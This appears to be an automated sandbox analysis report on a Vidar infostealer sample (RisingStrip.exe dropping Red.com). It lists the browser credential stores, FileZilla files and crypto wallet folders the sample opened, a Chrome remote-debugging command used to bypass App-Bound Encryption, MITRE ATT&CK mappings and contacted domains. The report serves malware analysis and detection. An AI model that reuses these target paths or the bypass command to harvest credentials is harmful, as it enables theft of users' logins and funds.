Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	12 Process Injection	111 Masquerading	2 OS Credential Dumping	1 Virtualization/Sandbox Evasion	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	11 Input Capture	3 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Extra Window Memory Injection	12 Process Injection	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	3 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	15 System Information Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RisingStrip.exe	26%	Virustotal		Browse
RisingStrip.exe	13%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Mountain	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\October	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://trufai.website/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
plus.l.google.com	142.250.186.110	true	false	high
play.google.com	142.250.185.142	true	false	high
t.me	149.154.167.99	true	false	high
trufai.website	116.203.13.109	true	true	unknown
www.google.com	172.217.18.4	true	false	high
apis.google.com	unknown	unknown	false	high
yOVsZEivtLSqqovnrmQMTfS.yOVsZEivtLSqqovnrmQMTfS	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://t.me/w211et	false		high
https://trufai.website/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://duckduckgo.com/chrome_newtab	im7gdj.12.dr	false	high
https://duckduckgo.com/ac/?q=	im7gdj.12.dr	false	high
http://anglebug.com/4633	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7382	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	f379r9.12.dr	false	high
https://issuetracker.google.com/284462263	chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://publickeyservice.gcp.privacysandboxservices.com	chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://polymer.github.io/AUTHORS.txt	chrome.exe, 00000011.00000003.2120790557.000001E000A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120874739.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119343056.000001E001050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121366236.000001E00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119449231.000001E001060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121056766.000001E0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119493169.000001E000F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120902891.000001E000FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120039426.000001E00107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119473142.000001E0010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121258393.000001E000F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121193500.000001E001158000.00000004.00000800.00020000.00000000.sdmp	false	high
https://docs.google.com/	chrome.exe, 00000011.00000003.2108117965.000001E0004A4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/(v	chrome.exe, 00000011.00000003.2141774477.000001E0015B8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://publickeyservice.pa.aws.privacysandboxservices.com	chrome.exe, 00000011.00000003.2150434077.000001E000B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://photos.google.com/settings?referrer=CHROME_NTP	chrome.exe, 00000011.00000003.2118874072.000001E000F28000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7714	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 00000011.00000003.2121366236.000001E00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121056766.000001E0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121193500.000001E001158000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/W	chrome.exe, 00000011.00000003.2140357692.000001E001A94000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/6248	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 00000011.00000003.2139142043.000001E0012D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135840351.000001E00141C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/Z	chrome.exe, 00000011.00000003.2140357692.000001E001A94000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/6929	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/5281	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/ir	chrome.exe, 00000011.00000003.2141774477.000001E0015B8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/g	chrome.exe, 00000011.00000003.2140357692.000001E001A94000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	f379r9.12.dr	false	high
https://issuetracker.google.com/255411748	chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7246	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7369	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7489	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/ls	chrome.exe, 00000011.00000003.2141774477.000001E0015B8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore	chrome.exe, 00000011.00000003.2117807265.000001E000F08000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.entrust.net/rpa03	RisingStrip.exe	false	high
https://drive-daily-2.corp.google.com/	chrome.exe, 00000011.00000003.2108117965.000001E0004A4000.00000004.00000800.00020000.00000000.sdmp	false	high
http://polymer.github.io/PATENTS.txt	chrome.exe, 00000011.00000003.2120790557.000001E000A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120874739.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119343056.000001E001050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121366236.000001E00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119449231.000001E001060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121056766.000001E0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119493169.000001E000F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120902891.000001E000FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120039426.000001E00107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119473142.000001E0010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121258393.000001E000F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121193500.000001E001158000.00000004.00000800.00020000.00000000.sdmp	false	high
https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview	chrome.exe, 00000011.00000003.2141822554.000001E0015CC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	im7gdj.12.dr	false	high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	f379r9.12.dr	false	high
http://www.autoitscript.com/autoit3/X	Red.com, 0000000C.00000000.1680369432.00000000005F5000.00000002.00000001.01000000.00000007.sdmp, Viral.8.dr, Red.com.1.dr	false	high
https://issuetracker.google.com/161903006	chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	im7gdj.12.dr	false	high
https://drive-daily-1.corp.google.com/	chrome.exe, 00000011.00000003.2108117965.000001E0004A4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive-daily-5.corp.google.com/	chrome.exe, 00000011.00000003.2108117965.000001E0004A4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://plus.google.com	chromecache_84.19.dr	false	high
http://anglebug.com/3078	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/7553	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/5375	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/5371	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/4722	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/9v	chrome.exe, 00000011.00000003.2141774477.000001E0015B8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/7556	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive-preprod.corp.google.com/	chrome.exe, 00000011.00000003.2108117965.000001E0004A4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	phlnoh.12.dr	false	high
https://google-ohttp-relay-join.fastly-edge.com/kt	chrome.exe, 00000011.00000003.2141774477.000001E0015B8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.entrust.net/2048ca.crl0	RisingStrip.exe	false	high
https://publickeyservice.pa.gcp.privacysandboxservices.com	chrome.exe, 00000011.00000003.2150434077.000001E000B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/6692	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://issuetracker.google.com/258207403	chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3502	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3623	chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3625	chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3624	chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/5007	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/vs	chrome.exe, 00000011.00000003.2141774477.000001E0015B8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3862	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 00000011.00000003.2120814682.000001E000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2122818393.000001E000F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120902891.000001E000FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2118003726.000001E000F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2117807265.000001E000F08000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/4836	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://issuetracker.google.com/issues/166475273	chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29	chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/4384	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://mail.google.com/mail/?tab=rm&ogbl	chrome.exe, 00000011.00000003.2135649140.000001E001374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135972980.000001E00142C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135907408.000001E001424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139166713.000001E001374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135732129.000001E001374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135793599.000001E0010D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139196653.000001E001458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139142043.000001E0012D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135840351.000001E00141C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3970	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/ut	chrome.exe, 00000011.00000003.2141774477.000001E0015B8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://policies.google.com/	chrome.exe, 00000011.00000003.2118874072.000001E000F28000.00000004.00000800.00020000.00000000.sdmp	false	high
https://apis.google.com	chrome.exe, 00000011.00000003.2139142043.000001E0012D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135840351.000001E00141C000.00000004.00000800.00020000.00000000.sdmp, chromecache_84.19.dr, chromecache_87.19.dr	false	high
http://crl.entrust.net/ts1ca.crl0	RisingStrip.exe	false	high
http://polymer.github.io/CONTRIBUTORS.txt	chrome.exe, 00000011.00000003.2120790557.000001E000A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120874739.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119343056.000001E001050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121366236.000001E00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119449231.000001E001060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121056766.000001E0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119493169.000001E000F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120902891.000001E000FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120039426.000001E00107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119473142.000001E0010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121258393.000001E000F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121193500.000001E001158000.00000004.00000800.00020000.00000000.sdmp	false	high
https://labs.google.com/search?source=ntp	chrome.exe, 00000011.00000003.2135649140.000001E001374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135972980.000001E00142C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135907408.000001E001424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139166713.000001E001374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135732129.000001E001374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135793599.000001E0010D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139196653.000001E001458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139142043.000001E0012D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135840351.000001E00141C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://domains.google.com/suggest/flow	chromecache_84.19.dr	false	high
